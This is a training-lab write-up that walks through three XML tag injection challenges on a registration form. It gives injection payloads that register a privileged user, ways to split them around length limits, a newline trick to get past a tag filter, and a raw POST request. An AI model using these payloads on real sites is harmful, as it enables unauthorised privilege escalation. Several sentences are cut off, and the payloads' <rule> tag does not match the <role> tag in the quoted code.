Warm-up: Lab XML Injection L1
\nEasy: Lab XML Injection L2
\nMedium: Lab XML Injection L3
\nIn these XML TAG or Fragment Injection labs, you will learn how to attack XML parsers to inject contextualized data that will alter the structure of the document without changing its validity.
\nAll labs are available at the following URL: http://info.xmlinjection.labs
\nThe main goal of these labs is to become a leet member.
\nThe web application presents a login form. You must enter as a leet member; otherwise, you'll be a looser.
\nFind a way to access as a privileged user!
\nThe best tool is, as usual, your brain. You may also need:
\nBelow, you can find solutions for each task. Remember, though, that you can follow your own strategy, which may be different from the one explained in the following lab.
\nNOTE: The techniques used during this lab are better explained in the study material. You should refer to it for further details. These solutions are provided here only to verify the correctness.
\n\n\nSimple XML TAG injection exploitation warm-up:\n*D0 u w@nn@ b3 a l33t m3mb3r?*
\n
There are two types of users: leet and looser. By default, every new user is a looser. Find a way to become a leet member.
\nA valid XML structure is reported in the core.js file within the function `WSregister__old`.
\nAs you can see in the previous implementation, the developers used a different approach that helps us to detect the XML structure in this scenario.\n
function WSregister__old() {\n ...\n var xml = '<?xml version=\"1.0\" encoding=\"utf-8\"?> ';\n xml += '<user> ';\n xml += ' <role>2</role> ';\n xml += ' <name>' + name + '</name> ';\n xml += ' <username>' + username + '</username> ';\n xml += ' <password>' + password + '</password> ';\n xml += '</user> ';\n ...\n}Testing parameter name Registering
\nIf we register a user, we can see that its name is echoed back in the welcome message and is encoded with htmlspecialchars.
\nFurthermore, if we try to inject some tags (e.g.,
Testing parameter password
\nIf we adopt the same approach with the password, we can see that even the password is not injectable!
\nTesting parameter username
\nThe only injectable parameter is the username.
\nIf we take advantage of the XML structure found in the core.js file we could easily inject our leet user as follows:\n
name: useless\nusername: useless</username></user><user><rule>1</rule><name>l33t</name><username>l33t\npassword: l33tThe leet login will be:\n
username: l33t\npassword: l33t\n\nSimple XML TAG injection exploitation with length limitation:\n *Does Length Matter?*
\n
There are two types of users: leet and looser. By default, every new user is a looser. Find a way to become a leet member.
\nA valid XML structure is reported in the core.js file within the function WSregister__old.
\nAs you can see in the previous implementation, the developers used a different approach than in this scenario, which helps us detect the XML structure.\n
function WSregister__old() { \n ...\n var xml = '<?xml version=\"1.0\" encoding=\"utf-8\"?> ';\n xml += '<user> '; \n xml += ' <role>2</role> '; \n xml += ' <name>' + name + '</name> '; \n xml += ' <username>' + username + '</username> '; \n xml += ' <password>' + password + '</password> '; \n xml += '</user> '; \n ... \n}Testing parameter name
\nRegistering a test user, we can see that the name of the new user is echoed back in the welcome message and is encoded with htmlspecialchars.
\nIf we try to inject some tags (e.g.,
Opening and ending tag mismatch ...Testing parameter username
\nIf we adopt the same approach as before, we can see that even the username is injectable!
\nTesting parameter password
\nIf we adopt the same approach as before, we can see that the password is not injectable!
\nLength limitations
\nWe notice that the name and username have length limitations of 35 characters.
\nIn fact, if we try to inject something longer, the application cuts/truncates our input.
\nSince we have two injection points, to bypass this limitation we can split and inject our payload in the two places:\n
name: </name></user><user><rule>1<!--\nusername: --></rule><name>x</name><username>x\npassword: l33tThe leet login will be:\n
username: x\npassword: l33t\n\nXML TAG injection exploitation with length limitation and filters:\n*If you're tired .. have a break!*
\n
There are two types of users: leet and looser. By default, every new user is a looser. Find a way to become a leet member.
\nA valid XML structure is reported in the core.js file within the function WSregister__old.
\nAs you can see in the previous implementation, the developers used a different approach than in this scenario, which helps us detect the XML structure.\n
function WSregister__old() {\n ... \n var xml = '<?xml version=\"1.0\" encoding=\"utf-8\"?> '; \n xml += '<user> '; \n xml += ' <role>2</role> '; \n xml += ' <name>' + name + '</name> '; \n xml += ' <username>' + username + '</username> '; \n xml += ' <password>' + password + '</password> '; \n xml += '</user> '; \n ... \n}Testing parameter name
\nRegistering a test user, we can see that the name of the new user is echoed back in the welcome message and is encoded with htmlspecialchars. But, if we try to inject some tags (e.g., Opening and ending tag mismatch ...
Testing parameter name
\nIf we adopt the same approach as before, we can see that even the username is injectable!
\nTesting parameter password
\nIf we adopt the same approach as before, we can see that the password is not injectable!
\nLength limitations
\nWe notice that name and username have length limitations of 34 characters.
\nIn fact, if we try to inject something longer, the application cuts/truncates our input.
\nSince we have two injection points, to bypass this limitation we can split and inject our payload in the two places:\n
name: </name></user><user><rule>1<!--\nusername: --></rule><name></name><username>x\npassword: l33tBypassing Filters
\nBypassing length limitations is not enough. The application implements some filters against the XML TAG injection that blocks the previous payload.
\nIn this case, if the filter detects some dangerous elements, it shows a message like the following:\n
So you wanna be a l33t member so easily?! \u0ca0_\u0ca0Injecting some metacharacters, we can see that &, \\ , , , \" , ' are filtered but < and > are not!
\nThere is another filter that blocks the
The check is case-insensitive, and it seems that spaces and tabs are ignored between the tag name and the close tag character, but if we inject a new line, it is not filtered!
\nSo the exploitation could be the following:
\nname: </name></user><user><rule{NEW_LINE}>1<!--\nusername: --></rule{NEW_LINE}><name></name><username>x\npassword: l33tNow the username has a length of 35; injecting this payload, we would have an empty username and thus an invalid login.
\nWe need to remove something from the payload, and the
The working exploit is:\n
name: </name></user><user><rule{NEW_LINE}>1<!--\nusername: --></rule{NEW_LINE}><username>l33t\npassword: l33tInside burp the request should look as follows:
\nPOST /add_new.php HTTP/1.1\n...\nname=</name></user><user><rule\n>1<!--&user=--></rule\n><username>l33t&password=l33tThe leet login will be:
\nusername: l33t\npassword: l33t